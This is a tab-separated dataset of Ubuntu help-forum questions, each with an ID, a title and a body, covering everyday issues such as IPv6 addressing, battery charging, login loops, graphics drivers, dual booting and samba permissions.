508732	unable to get both ra and dhcp6 address on a particular nic	my host is connected to a network that is connected to router and dhcp6 server . radvd.conf setting on the router is given below : interface eth1 { advsendadvert on ; advmanagedflag on ; advotherconfigflag off ; prefix fc00:192:168:30 : :/64 { advonlink on ; advautonomous on ; advrouteraddr off ; } ; } ; dhcp6s.conf setting : interface eth1 { server preference 255 ; renew-time 360 ; rebind-time 450 ; prefer-life-time 500 ; valid-life-time 500 ; allow rapid-commit ; link aaa { range fc00:192:168:20 : :100 to fc00:192:268:20 : :200/64 ; prefix fc00:192:168:20 : :/64 ; } ; } ; in ubuntu 14.04 client host : in /etc/sysctl.conf file added : net.ipv6.conf.all.accept_ra = 1 net.ipv6.conf.all.autoconf = 1 in /etc/network/interfaces iface eth1 inet manual iface eth1 inet6 auto when i am setting `` iface eth1 inet6 auto '' i am getting only ra address ( fc00:192:168:30 : :/64 ) and if i am setting `` iface eth1 inet6 dhcp '' i am getting dhcp6 address ( fc00:192:168:20 : :/64 ) . please let me know is there any way using which i can get both ra and dhcp6 addresses on eth1 . thanks in advance , shruti
508733	how to find out what 's wrong with my battery ?	native-path : bat0 vendor : asustek model : m50 -- 24 power supply : yes updated : vi 08 aug 2014 21:42:17 +0300 ( 30 seconds ago ) has history : yes has statistics : yes battery present : yes rechargeable : yes state : charging energy : 0 wh energy-empty : 0 wh energy-full : 42,141 wh energy-full-design : 51,26 wh energy-rate : 0 w voltage : 8,662 v percentage : 0 % capacity : 82,2103 % technology : lithium-ion what do you make of this ? battery seems to be fine except for the fact that it 's not charging . it 's charging at the rate of 0 wh . anything i can do to fix it ? edit : it does n't charge past 0 % , not because of the capacity , but because of ( what ? ) that will give me the output : energy-rate : 0 w . i have already accepted that the battery is broken and i need to change it . i just want to know what exactly broke . edit2 : or how to find out .
508734	auto-mount usb drives when plugged in	i have some old usb-drives that sometimes unmount itself but i do n't have the time to replace them by better drives so soon . how can i configure ubuntu 14.04 so it automatically re-mounts the external drives and partitions in the same mount-folder so am mp3 running from that drive continues playing when the drive is back withut having to click on the drive on the left in nautilus ?
508737	login loop after fsck to fix not booting ( common fixes not working )	in the last month my thinkpad x201 running 14.04 has n't booted multiple times and drops into initramfs . each time i had to use a live usb and fsck to fix errors , so it would run again . this usually happens if my computer is off for a more than a few minutes and i try to turn it on again . not sure if my hard drive is failing . today i used fsck again and it worked , but after i logged in my password stopped working and when i rebooted i could n't log in anymore ( password invalid ) . i followed instructions to reset my password and found out that my key mappings had changed ( causing me to mistype it ) . i created a new password , which works , but now i have a login loop where the correct password just takes me back to the login splash . ( incorrect passwords still show as invalid ) . *edit : i can still log in as guest i tried removing .xauthority like this : switch to shell ( ctrl+alt+f1 ) logged in as the user cd /home/user sudo mv.xauthority .xauthoritybak sudo reboot that did n't work and .xauthority has not been recreated as far as i can tell , since subsequent tries now show a 'file does not exist ' . then i tried : sudo chown username : username .xauthority and sudo chown username : username * eventually i tried replacing lightdm with kdm , but the problem still persists . so , i have 2 questions : how can i fix the login loop ? what might be causing all this ? ( my laptop is 4 years old and has been running fine until recently )
508738	running windows apps on ubuntu ( wine ? )	hello brothers & sisters in linux ! i have a question concerning running windows applications on ubuntu . i was using ubuntu for a long time , but then i had to convert back to windows because i found out that wine did n't make it to run some applications as photoshop , after effects , vegas pro , dreamweaver , etc ... i 'm asking you guys for a help how to run these programs in these days ( sort of speak ) . has there been any major update for wine that eliminated those emulation problems ? will wine run all of my applications today ? if not , how can i run these applications on ubuntu ? thank you in advance ! really appreciate your help ! a .
508739	ubuntu 14.04 on toshiba suddenly super slow	i have a toshiba satellite c55 with ubuntu 14.04 with a 320gd hdd and 6gb ram . it dual boots with windows 8 ( which i never log into ) . i usually completely shut-down the laptop only every 2 days . since the last time i did it has become very slow . i have no idea . it wo n't shut-down , gets stuck on the ubuntu splash logo ( it gets stuck at speech-dispatcher disabled ; edit /etc/default/speech-dispatcher ) . i have to power it down . when i turn it back on , it takes about 5 minutes to reach the login screen . after i login , all the apps show up after a few minutes . it takes about ~3min to launch the browser . wifi has become slow , suddenly . any suggestions ? i have no idea what is going on !
508742	in the last 2 months i have no boot for second time	good day , yesterday i installed the last update . i have ubuntu 12.04 . shutted down and when i turned on a few hours later i had no boot . the first time i had no boot i used boot-repair with success . this time it does n't work at all . here is the inform i got : http : //paste.ubuntu.com/7990955/ please , can you tell me what to do ? thank you very much .
508744	ca n't get utouch to show available wifi networks	i have ubuntu touch installed on a 2014 nexus 7 . swiping down from the wireless symbol reveals a `` network '' menu with the choices flight mode , wifi settings , and cellular settings . wifi settings leads to another menu : previous networks , and other networks . previous networks shows a list of networks used in the past ; other networks opens an empty box for typing in the name of a network . i do n't see any way to show a list of available networks detected by the device . on rare occasions , swiping down the wireless symbol actually does bring up a list of detected networks . but most of the time ubuntu touch exhibits the behavior described above , with no apparent way to bring up the list of available wireless networks . i would like to see a list of the availble networks , if there is a way to do so . edit : the wifi menu works properly now . just needed a couple of reboots , it seems . i have other problems , though . if these other problems persist i will make a post specific to them . this device is a 2013 nexus 7 4g . not sure how to find the ubuntu version . ca n't navigate the settings menu right now because it got stuck and there 's no way to go back , except to reboot ( ! ) i 'll open multirom manager or boot into recovery and look for the information there .
508745	running { command vs through bash script } + redirect output	i am not sure if it is one or two issues here : file /usr/bin/line1 wine /home/aiao/.wine/drive_c/program\ files\ \ ( x86\ ) /line/line.exe > /dev/null 2 > & 1 file /usr/bin/line2 ! # /usr/bin/bash wine /home/aiao/.wine/drive_c/program\ files\ \ ( x86\ ) /line/line.exe > /dev/null 2 > & 1 the wine command itself works fine but when i run /usr/bin/line1 , i get : : ambiguous redirect1 : 1 and when i run /usr/bin/line2 , i get : wine : bad interpreter : no such file or directory how can i run command through bash script ? what is going on here ?
508748	scrollwheel in gnu screen in xfce4-terminal	i apologize that this is pretty much a duplicate of using the scrollwheel in gnu screen -- trusty specific difference but i do n't have enough reputation to comment on that and i can provide much more information about the issue that might help with answering both of us . i am currently running xubuntu 14.04 trusty as a clean install and having an issue with the scrollwheel functionality when running gnu screen in an xfce4-terminal . this issue did not occur in xubuntu 12.04 . in fact , since i spend a lot of time in a terminal window using screen this functionality was appreciated . here 's how to replicate it : open xfce4-terminal . start screen . run ls /usr/bin ( or anything to get more than the terminal height in lines ) . attempt to scroll up with the scrollwheel with the cursor in the output window . what happens : previous entries from .bash_history show on the command line expected behavior : scroll back through the output also note , that at least in my case , the scrollbar seems to 'jump up ' about 20 lines even though the output is not scrolled . if i click on the scrollbar the output 'jumps up ' to that position . dragging the scrollbar down puts the output where it belongs . also note that if i hover over the scrollbar and use the scrollwheel it functions as intended . i have google 'd all manner of permutations of my issue and have made a modifications to my .screenrc which , ironically , fixed the problem when connecting to the machine via putty : term xterm-256color termcapinfo xterm* ti @ : te @ < = this is what fixed it in putty caption always defscrollback 4000 startup_message off msgminwait 0 bind `` `` windowlist -b no matter what other termcapinfo lines i use , nothing fixes it . as i said , connecting via putty and running screen there it works as expected . i have also found that if i do the same steps in just plain old xterm the issue does not occur . any ideas ?
508749	disable keyboard shortcuts for window snapping	i think my question is related to this post but i do n't have ccsm installed at the moment , and i do n't want to unless i have to ( some of the things you can change in there can cause quite a lot of mess ) . i am using unity tweak tool , in particular to customize the behaviour of window snapping ( top : maximize , left : left-half , right : right-half ) . however , when i activate this specific option , it seems to override my keyboard shortcuts ctrlsuper+↑/↓/←/→ , which i normally use to move my windows across desktops . i do n't understand why unity tweak tools would activate keyboard shortcuts for a feature that involves dragging the window around , and most importantly why these shortcuts would override mine . what is the easiest way to disable keyboard shortcuts for window snapping while preserving the feature using mouse-drag ?
508750	chromium-browser does n't see adobe flash after 33 to 36 update	i 'm using ubuntu 12.04 after chromium update from standard repos flash does n't works in chromium . flash is installed in the system , and firefox can use it . how can i restore flash functionality in chromium ? user saiarcot895 thanks . it was a solution for my problem . i need to install pepperflash-plugin for my system . here is solution for this .
508753	dashboard - adding , editing and removal	what are the implications of removing all the partition icons to reduce confusion by 'normal users ' . how do you add your own items , folder or drawer . i 'm looking to sell my general-business-package across yorkshire . moving their pc stock onto ubuntu but ensuring they have an easy transition from their current o/s and application .
508754	/dev/mem : mmap : operation not permitted : using dmidecode	i am trying to get my bios firmware version , and memory info using dmidecode . i am connected to the server through ssh as a root user . we recently just started moving our servers from debian 6.0 , to ubuntu 12.4 lts . is there another way to get the bios info , or someway to get dmidecode to work ? even when i run dmidecode alone , with no options , i still get the same message . root @ 'machine ' : ~ # dmidecode | grep -a3 -i 'bios information' # dmidecode 2.9 smbios 2.6 present . 61 structures occupying 3910 bytes . table at 0x00099000 . /dev/mem : mmap : operation not permitted also rebooting the servers is not really an option to get the bios info
508755	installing ubuntu on secondary hard drive to be built into another device	here 's the story : i have a quite old laptop with a broken dvd drive , a broken harddisk and no possibility to boot from usb . my idea was to build a harddisk as secondary drive into my pc ( which already runs with ubuntu ) and install ubuntu ( or xubuntu or some other derivate with modest requirements ) on it . after that i would integrate that harddisk in the old laptop . my question is , how to install ubuntu on that drive without corrupting the existing boot loader , grub , whatever on the pc . should that be installed using a live system or can it be done from the running system ? are there any pitfalls i have to deal with when i install ubuntu via another system than that it should work with afterwards ?
508756	laptops to install ubuntu	what are some good laptop options for me to install linux ubuntu into ? thank you , sinan p.s . i am a new to ubuntu .
508757	xubuntu/windows 7 dual boot - video issue	i recently wiped the hard drive of my toshiba satellite e45t-a4200 to remove the pre-installed windows 8 . next , i installed windows 7 ultimate x64 via flash drive , and upon completion i was able to boot to desktop with no issues . then , from within windows , i shrunk the partition by 150gb to install xubuntu . finally , i loaded xubuntu 14.04 x64 on my flash drive using universal usb installer , and i was able to install it just fine on the previously mentioned partition . when the computer powers on , i am able to boot into xubuntu ( listed as ubuntu on grub ) and login to my desktop with no problems . however , when i rebooted and attempted to launch windows 7 from grub , my laptop displayed a black screen with horizontal lines randomly positioned across the screen . the lines eventually go away and i can hear the windows 7 sound once it reaches the login screen , but the screen remains completely black . could xubuntu have somehow messed up windows ' ability to properly use my video card ? any help would be greatly appreciated .
508759	how to start a ubuntu desktop with exceed on demand	sorry i 'm a noob , but i need to know the command to start a ubuntu 14.04 lts desktop with exceed on demand . i 'm able to start a kde and gnome desktops on my rhel linux desktop with the /usr/bin/gnome-session and /usr/bin/startkde in the `` command '' section of my exceed xstart file . but i 'm not having any luck with ubuntu . thanks
508760	overheating lenovo laptop	i have a lenovo thinkpad edge s430 . i experienced maybe three abrupt poweroffs with this laptop and the reason is very likely overheating . i eventually installed psensor to monitor my problem , and i 'm getting 90 degrees + . how can i fix this overheating problem ?
508761	mca : data cache level-0 read error	i often encounter `` processor contect corrupt '' error . and after that operating system restarts itself in 30 seconds . the full mscelog log is below : mcelog : unsupported new family 6 model 3c cpu : only decoding architectural erro $ hardware event . this is not a software error . mce 0 cpu 3 bank 1 misc 86 addr 1eabe1680 time 1407525231 fri aug 8 15:13:51 2014 mcg status : mci status : corrected error mci_misc register valid mci_addr register valid mca : data cache level-0 read error status 8c00004000000114 mcgstatus 0 mcgcap c09 apicid 6 socketid 0 cpuid vendor intel family 6 model 60 i tried to test memory using memtest86+ . i did n't encounter any error . cpuinfo processor : 0 vendor_id : genuineintel cpu family : 6 model : 60 model name : intel ( r ) core ( tm ) i5-4440 cpu @ 3.10ghz stepping : 3 microcode : 0x7 cpu mhz : 800.000 cache size : 6144 kb physical id : 0 siblings : 4 core id : 0 cpu cores : 4 apicid : 0 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 fma cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm ida arat epb xsaveopt pln pts dtherm tpr_shadow vnmi flexpriority ept vpid fsgsbase smep erms bogomips : 6186.62 clflush size : 64 cache_alignment : 64 address sizes : 39 bits physical , 48 bits virtual power management : if you want to learn more information about the machine , i can add .
508763	moving all files of a certain type or extension	i have a large external with many subfolders that i want to move all videos , pictures , and music to another hard-drive , what would be the best way to do this ?
508766	problems repairing dropbox	i installed dropbox and it did not show the green draw when it 's syncronized , so i just uninstalled it and tried to install it again . it was taking so long for uninstall so i just decided to restart my pc . now , it ca n't uninstall because it says that i have to `` sudo dpkg -- configure -a '' when i type that , it starts to download nautilus-dropbox . it downloads but when it 's 100 % , does n't do anything more . now , i ca n't install anything because it has to repair this package . what can i do ? please help !
508767	remove icons from system tray	how can i disable icons within the tray ? for example , i need to turn off dropbox icon . how can i do that ? i am using unity . thanks in advance .
508769	ubuntu not switching open windows like ms windows os	i am on ubuntu 14.04 . one thing i noticed bugging me really bad that i did not notice in previous releases is the automatic switching of open windows . for example , when i download a file the option comes up to save , well i am used to just pressing enter immediately or just typing the save as name of the file . now i have to click on the window then press enter to save or start typing a new name for the file . is there a way to have ubuntu automatically switch windows like when i download a file ? sorry to everyone if i did n't do a good job explaining my question . was n't sure what words to use to describe it . i also searched everywhere for an answer for several weeks however , it might be my poor way of describing the problem as well that i ca n't find an answer .
508770	re-allocate space to /usr	pardon my newbee-ness , but when i look at my file system with df -h , i see how most of my space is in /dev/sda1 . i 'd like to add space to /usr , to install hadoop . i am confused about how to re-allocate that space , or if i even need to . can someone clear up my understanding ? thanks in advance .
508774	problem before getting to the login screen	this is the problem : i was trying to get rid off the cairo-dock desktop option ( when you have the login screen and click on the ubuntu symbol and then you have the option to choose what kind of desktop you want ... gnome , gnome classic , unity-ubuntu or cairo-dock ) and by accident i make as disable the `` docky '' program in the startup configuration . then i restart the system and trying to login in the cairo-dock session but then the system get like frozen ... there was only a black screen . i tried to reboot the system . the grub2 screen was working ok . i was even able to open the windows 7 partition . but when i tried to open the ubuntu system there was an image of the symbol of gnome ( the thing that looks like a foot ) loading and after that instead of normal login screen there was only a black screen . what steps do i take from here ?
508781	are any files copied when i move files from a folder into another folder on the same disk ?	or is only the reference changed ? it 's a general question . not really ubuntu-specific . btw : i 've tried sudo fdisk -l , it does n't seem to give the full picture .
508783	how can i make an ubuntu media server with samba shares and deluge ?	here 's what i 'm looking to do . i want samba shares that i can read , write , and execute on . if i put a file there on one computer , i want to be able to delete or edit it from another . i also want to run a deluge daemon that will put files into the directories shared by samba , and minidlna streaming to xbox . i 've tried this a couple times , and ran into many problems . my problems are with owners and permissions . first , i minidlna could n't access things placed by deluge because it was denied permission , so i messed around with chmod and chown , and then i could n't delete things i 'd placed in samba shares . soon everything i tried to do ended in `` permission denied '' . i 'm going to start all over . i understand how to install deluge and samba , and how to edit conf files . my questions are , should i use one user for samba sharing , running deluge daemon , and minidlna ? should this user or users have a password ? what should the directory and file permissions be in smb.conf ? what options should i have in fstab when i mount the partitions i 'm sharing ? if there 's multiple users for these services , should they all be in a group ? the guides i have read for deluge on an ubuntu server had me create a user `` deluge '' with no password that would run the daemon . the guides on samba had me use the user i created on installation . there was no info on using them together .
508784	issues installing ubuntu on nexus 7 2013 ca n't get past the ubuntu recovery image	i 'm having problem installing ubuntu on my nexus . i 've used this guide , i 'm running ubuntu 14.04.1 lts in virtualbox . http : //developer.ubuntu.com/start/ubuntu-for-devices/installing-ubuntu-for-devices/ i successfully executed the following command in my console : eduard @ virtualbox : ~ $ ubuntu-device-flash -- channel=devel -- bootstrap 2014/08/08 15:57:48 expecting the device to be in the bootloader ... waiting 2014/08/08 15:57:48 device is |flo| 2014/08/08 15:57:49 flashing version 157 from devel channel and server https : //system-image.ubuntu.com to device flo 2014/08/08 15:57:49 ubuntu-touch/utopic is a channel alias to devel /home/eduard/.cache/ubuntuimages/ubuntu-touch/devel/flo/version-157.tar.xz /home/eduard/.cache/ubuntuimages/pool/ubuntu-cc685aa9629136f5d36b3045a61be694da1483efd03c24cebd254322c4dc49be.tar.xz /home/eduard/.cache/ubuntuimages/pool/device-b908c08a7ee5b7d4f68322144ef7f15f91bfe12efd0d3617d67722f08dd51e6b.tar.xz 2014/08/08 15:59:13 can not cleanup tree to ensure clean deploymentexit status 255 but the guide says the following : wait until the reboot is done . in most cases no input from you is required.the process takes some time . first , an appropriate image is downloaded to ~/.cache/ubuntuimages . then , the parts of the images are deployed to the device . ubuntu is deployed to the devices as a ârecoveryâ image . then , the device boots from the recovery image and installs ubuntu as the normal os . finally , the device boots into ubuntu for devices . this does n't happen on my device . i see the ubuntu touch ( com-bases ) recovery v6.0.4.6 menu , with the following options : - reboot system now - wipe data / factory reset - wipe cache partition - backup and restore - advanced whichever i tried so far it always got me boot to android . backup and restore says : -- not really backing up data ... if i reboot , it will boot to android , then i have to shut down android before , and start it all over , re-flashing the device with ubuntu then it would bring me to the same ubuntu recovery boot screen over-and-over . then i try factory reset , i confirm to wipe everything , after reboot i see the ubuntu sign loading with a progress bar , then it resets again . also i fail to connect the device to my virtual machine while it 's in the ubuntu recovery menu , as i 'm getting an error in virtualbox . can someone tell me what 's wrong ?
508789	sudo -s works but su does not in ubuntu ?	i have linux virtual machine ( ubuntu 12.04 ) installed on my mac os . on my terminal , user @ 192.78.0.1 : ~ $ su password : su : authentication failure user @ 192.78.0.1 : ~ $ ls -lth /bin/su -rwsr-sr-x 1 root root 36k sep 12 2012 /bin/su but the following works : user @ 192.78.0.1 : ~ $ sudo ls [ sudo ] password for user : ( ... .lists the directories ) user @ 192.78.0.1 : ~ $ sudo -s [ sudo ] password for user : root @ 192.78.0.1 : ~ # hence the question is , why sudo -s works and logs in as root , while su results in authentication failure . i typed the passwords correctly each time . also sudo ls works
508790	do i need to install apache2-mpm-worker libapache2-mod-fcgid php5-cgi like i used to in previous versions of ubuntu ?	i 'm installing ubuntu 14.04 from amazon ec2 ami . when installing apache mpm worker in older releases of ubuntu , the following packages were required : sudo apt-get install apache2-mpm-worker libapache2-mod-fcgid php5-cgi after installing lamp on ubuntu 14.04 i noticed that mpm_worker is already under /etc/apache2/mods-available/ do i need to still install those packages above or enabling the worker by `` a2enmod mpm_worker '' is all i need to do ? thanks
508792	black screen after wubi install on windows 2000	i just installed ubuntu on my mother 's pc , because it had windows 2000 . so i installed the iso and put it on my usb and started the .exe on her pc , using wubi . after that i went trough the installation and everything started fine and ubuntu was installed . since my keyboard would n't work on startup i had to set ubuntu as my default operative system on windows 2000 . after that i started ubuntu and then it started to install stuff . later , it rebooted and then it was just a black screen with my green light blinking . i tried pressing right shift on startup but nothing happened .
508794	how to take/release control of output ?	i have two parallel processes running shell script , each will print to stdout from time to time using echo . but sometimes the output may mixed up . is there a way to take exclusive use of stdout , then release it ?
508796	ubuntu 14.04 chromium causes black screen	while using chromium normally , some url 's cause my computer to go black screen . computer works fine but cant see anything . can change to console using ctrl+ alt + f1 but still black screen ( i think the screen is shut down ) . i had to reboot using ctrl + alt + del . is this a chromium bug ? the url 's in question seem to have some sort of animation . this is one of them : http : //www.spacecraftforall.com/ if you have some information on this bug or know how to fix it , please say something . thank you .
508799	error while copying to `` udf volume '' . the destination is read-only	just wanted to place a pdf file i downloaded off of the net onto a cd-rom . why is n't this working in ubuntu ? i get the message in the title when i try to . also why does this site say you do n't have to register to ask a question then forces you to register if you want to ask one ! ! ? ?
508800	dual boot with windows 7 , can not access shared storage from windows	i just set up a dual boot with windows 7 and ubuntu 14.04 . i set them up so they have a common storage space on an hdd , with the os 's on an ssd . when i save from within ubuntu , the files do n't show up in the folders on the hdd in windows 7 . however , when i save from windows i can still access those files from within ubuntu . why ? i followed this tutorial : how to harmonize your dual-boot setup for windows and ubuntu thanks ! i have downloaded ethernet/wifi/usb/cd drivers for windows 7 from the internet using ubuntu but they wo n't show up in windows to install them ! and there is no way of windows being able to get said drivers because of it 's complete lack of drivers !
508802	failed installed amd radeon hd 3450 driver on ubntu 14.04	several weeks ago , i try to install graphics card driver on ubuntu 14.04 and i following several solutions in the following links : https : //www.youtube.com/watch ? v=ka5gbmlo-zo http : //www.yourownlinux.com/2014/04/how-to-install-amd-catalyst-14-4-graphics-driver-in-linux.html http : //linuxg.net/how-to-install-amd-catalyst-14-4-on-linux-systems/ what is the correct way to install proprietary ati catalyst video drivers ( fglrx ) directly from amd ? ca n't install catalyst 12.8 ca n't install the propiertaries ati graphics driver and i downloaded the latest version of the amd driver for operating system ubuntu from the official site ( http : //support.amd.com/en-us/download ) and in all cases when installing driver , this error message appears : and when run command with `` -- force '' and after the restart device , i could not log on ! and every time i go back to the login page or the screen does n't worke , except the mouse pointer ! i found this link and solve the problem , but graphical card driver does n't installed ! : ( ca n't login after amd catalyst driver installation with knowing , i used linux mint 11 in same device and the graphics card driver installed in the same ways successfully my device is `` dell studio 1535 '' , graphical card is `` [ amd/ati ] rv620/m82 [ mobility radeon hd 3450/3470 ] ''
508806	systray icons missing after app crash	after installing alarm clock ( alarm-clock ) from the software center , the program immediately crashed and made the icons in my systray disapear except for power , sound , time/date , and the gear . i tried logging off , rebooting , removing the program , and nothing has brought my icons back . i know they are still running up there , because i got skype setup to autostart and it had an icon up there running before i installed the alarm clock program . is there anything i can do to get my icons back , or do i need to reinstall the os ? i 'm running ubuntu 14.04.1 btw ...
508807	best compatibility { thinkpad vs. macbook }	i am a fun of ubuntu and lenovo . so far i have used ubuntu 12.04 lts and 14.04 lts in many different machines including lenovo g570 and thinkpad t430 . now , i am about to buy a new laptop . my preference is lenovo but i am not sure which version is the most compatible with ubuntu 14.04 lts . alternatively , it would be nice to try macbook but , again , i am not sure which version is the most compatible with ubuntu 14.04 lts ( if any ! ) . what would you suggest me ?
508810	how do i turn sound on while using xbmc in full screen mode ?	while using xbmc on full screen mode , if the sound is silenced , i have to leave full screen mode and use the sound tray icon to turn sound on . is there a way to do this without leaving full screen mode on xbmc ?
508820	64 bit xubuntu on full software raid 0 using mini.iso	what i am asking is doable but the thing is i forgot how to do it since the last time i did . i recently upgraded my ram to 8gb from 2gb . i am using an asus maximus extreme with an intel core 2 duo qx9650 and an nvidia vga ( i dont remember which one ) and 2 1tb hdd set to raid 0 ( i will be using 2 identical spare hdds for the new install , the 32 bit is still operational ) running xubuntu 14.04 32 bit with no other os on the drives . i remember using an alternate install ( could have been 12.04 ) before gradually upgrading to 14.04 their configuration is as follows 4 separate identical partitions for each hdd containing `` / '' , `` /boot '' , `` swap '' and `` /home '' with sizes of 10 gb 500 mb 4 gb and what is left respectively . using the alternate install and later on boot repair ( do n't remember how ) , i created the 4 md devices with a software raid 0 , for each pair of partitions since i am upgrading my ram to 8gb i would like to also upgrade to a 64 bit xubutnu install i have been trying day and night to recreate what i did last time with no results during my first attempt where i initialized all md devices ( including the /boot ) from the mini.iso , it could not install grub to ( the md2 which was created ) at all resulting in a fatal error . in an other instance i did not create an md device for /boot and attempted to install grub only on one ( disk ) partition where i would attempt using mdadm after booting into linux , only to fail miserably as it would get stuck at `` update-grub '' and 66 % . i am currently retrying to install grub on one of the drives ( at the same time creating the identical partition on the other drive with the hope that i will be able to reinstall grub after creating an md device ) . this attempt has also failed , getting stuck at `` update-grub '' , i thought that since i was not wiping clean the /boot partitions and just using quick format ( only removing the address table ) the installer would get confused as it would identify two /boot partitions , again with no luck . after my third attempt and getting tired of grub i was able to install lilo on only 1 partition without using raid ) on it , but it takes too long to boot . i would prefer to use grub on a raid 0 . i am not sure what to do at this time , i would appreciate any suggestions . thank you in advance for your time ! ! !
508824	error on new ubuntu-update ? ( ubuntu touch )	some minutes ago , my phone rang and showed , that an update ( to version 179 ) is available . so i tried to update . after reboot , it asked me , if i want to disable some recovery-mode . but i do n't want to disable it . after restart , it shows me any time , that this update is available . have i to disable it for updating or is it any other mistake ?
508829	does using ubuntu bootable usb leave trace/scope for recovery software ?	i am currently using windows 8 on my laptop in order to remove personal information from laptop . i used usb bootable drive of ubuntu to cut/copy paste my data to external hdd . by adopting this will it leave any trace or scope for recovery tools like getdataback ntfs to recover data on windows 8 hdd ?
508833	packard bell vab70 keyboard & touchpad not working	i am trying to install ubuntu on a packard bell vab70 laptop . initially i installed 12.04 , during the installation process the touchpad & keyboard worked , so i was able to enter the wi-fi key . however on completion of the installation both do not work . i subsequently installed 14.04 64 bit , and the same problem occurs .
508836	onekey recovery with a different os installed	i am ready to make the switch to ubuntu i think . windows is nice , but it 's time to assume control of my system . i have a yoga 11s and am installing ubuntu 14.04 . before i do though , in case anything goes wrong , i was wondering if lenovo onekey recovery would still work if i have a different os on my c : / drive ? there is a `` recovery button '' on my laptop ( a little tiny reset button that you have to use a pen to activate . ) you can re-install windows 8 from this . however , i do n't know where the install files for the button are located . if i wiped the c : / drive and installed ubuntu would the recovery button still work ? does it run off of the d : / drive that came pre-installed labeled lenovo ? what i 'm trying to say is ( sorry for the rambling , just trying to give as much information as possible ) if i install ubuntu and screw up , can i back out easily ? thanks in advance , gabe
508837	ubuntu 14.04 is recognizing my full hdd : d drive	windows 7 and ubuntu are dual booted on the same drive , however my second drive : d which has 881gb is only showing as 40gb available on ubuntu labeled as `` computer '' in system files , in ubuntu , and my main drive : c being labeled as `` os '' is only showing 37gb available , which is correct . please excuse my lack of knowledge , obviously i 'm a newbie to linux , so i 'm just trying to get this squared away . do i have to re-partition this or ? ... -thanks a bunch for the help guys , really appreciate it .
508838	when i suspend my computer and wake it up a wall of text screen shows up saying like `` could not force dpm to low ''	when i suspend my computer and wake it up a wall of text screen shows up saying like `` could not force dpm to low '' but then a split second later it goes to the login screen and everything works perfectly . what does that mean `` could not force dpm to low '' and how do i fix it even though it ( appears ) to not be affecting anything ?
508840	wrong icon for a .odg files ( libreoffice draw ) , ubuntu 14.04 , libreoffice 4.2.4.2	have strange issue . the .odg files made with libreoffice draw have wrong icon ( as shown below ) . other open document formats from libreoffice have icons similar to application icons . i have ubuntu 14.04 installed with native unity , ambiance and ubuntu-mono-dark theme . libreoffice 4.2.4.2 has `` galaxy-style '' set of icons ( but it doens't affect files icons , as far as i know ) . all associations are set correctly . all the png/svg files for `` libreoffice-draw '' in /usr/share/applications/app-install seem to be correct . i do n't even know from where this wrong icon was taken . how it can be fixed ? thank you in advance .
508844	why does hitting control + c when in an application launched from a script , break the script ?	to jump straight in : while true ; do # -- - menu logic here , stick response in $ menuexit # -- -- deal with responses here if [ $ s1 == $ menuexit ] ; then tail -f /path-to-file else sleep 2 fi done i 've tried to keep this as simple as possible , if you need more , let me know . basically , i am sticking a menu in a loop , so , if there is incorrect user input or a command finishes , it is meant to re-display the menu . it worked fine , until i added the tail command . if i choose the tail option from the menu , the tail command gets launched fine - but , if i hit ctrl + c , i would like tail to terminate and the menu to be displayed , but it instead both terminates tail and the script . i have tried various things such as continues/traps and more , but , i have hit a brick wall and would like some help please ? !
508845	i just installed a 14.04 32 bit update , and now i get no video using n-vidia drivers	i just performed a suggested update by the update manager on ubuntu 14.04 , and now i get no video when i reboot . i get the splash screen , then it goes black . can i somehow switch back to default x drivers from terminal ?
508846	`` java.lang.exceptionininitializererror '' error during start up on 12.04	i am getting `` java.lang.exceptionininitializererror '' error during start up . how do i fix this ? hardware : acer i.3 fourth generation .
508847	ubuntu 12.04 can not not shutdown and reboot automatically	i have 12.04 installed on my laptop , and recently i found that my laptop can not shutdown , even if i press the shutdown button or : sudo shutdown -h now sudo shutdown -p now sudo init 0 the system will close and screen becomes dark , but the system reboots automatically . i 'm not sure if i installed some software or updated some system software . how can i solve this problem ?
508848	how to disable second vga lenovo y510p	i have a lenovo y510p with nvidia geforce gt 755m sli and i installed ubuntu 14.04.1 today . usually i do a check for software/hardware compatibility , so i read in many places that i wo n't be able to run the sli ( yet ) . i do n't want to use bumblebee . so i have come to rest with the idea , but there is a problem . i want to get into a kind of a power saver mode ( i 've already done that by installing cpufreq ) . my real concern is that while in windows 8 i can just access device manager and disable the second vga , with ubuntu this is not the case . i should probably mention that i have changed the vga drivers in software and updates - > additional drivers from using x.org x server ( nouveau ) to using nvidia binary driver ( 331.38 ) . the first problem is checking if the video cards are both working . i have read in some places that lspci | grep vga is the right way to do it , which yields : 01:00.0 vga compatible controller : nvidia corporation gk107m [ geforce gt 755m ] ( rev a1 ) this suggests that there is only one vga running . however , i can clearly hear the fan from the one in the ultrabay ( secong vga ) . furthermore , lshw -class display yields *-display description : vga compatible controller product : gk107m [ geforce gt 755m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:50 memory : d3000000-d3ffffff memory : a0000000-afffffff memory : b0000000-b1ffffff ioport:5000 ( size=128 ) memory : b2000000-b207ffff *-display description : 3d controller product : gk107m [ geforce gt 755m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:07:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : driver=nvidia latency=0 resources : irq:51 memory : d2000000-d2ffffff memory : c0000000-cfffffff memory : d0000000-d1ffffff ioport:4000 ( size=128 ) on top of that , when i access nvidia x server settings , it shows gpu0 and gpu1 , both having temperature which shows that are working . my questions are : what is the correct way of seeing which video card is working how can i disable the second one ? please be a bit more detailed , because i have only joined the ubuntu community as of today : )
508854	new user account has no password even sudo passwd accountname	i created a new user account without a password . i later used the gui and terminal methods to add a password to this new account . i have tried several time with reboots , logout/login after adding the new password both from the root/administrator account and even this new user account . the user still does not need to enter a password at the login screen . any next steps / ideas ? thanks
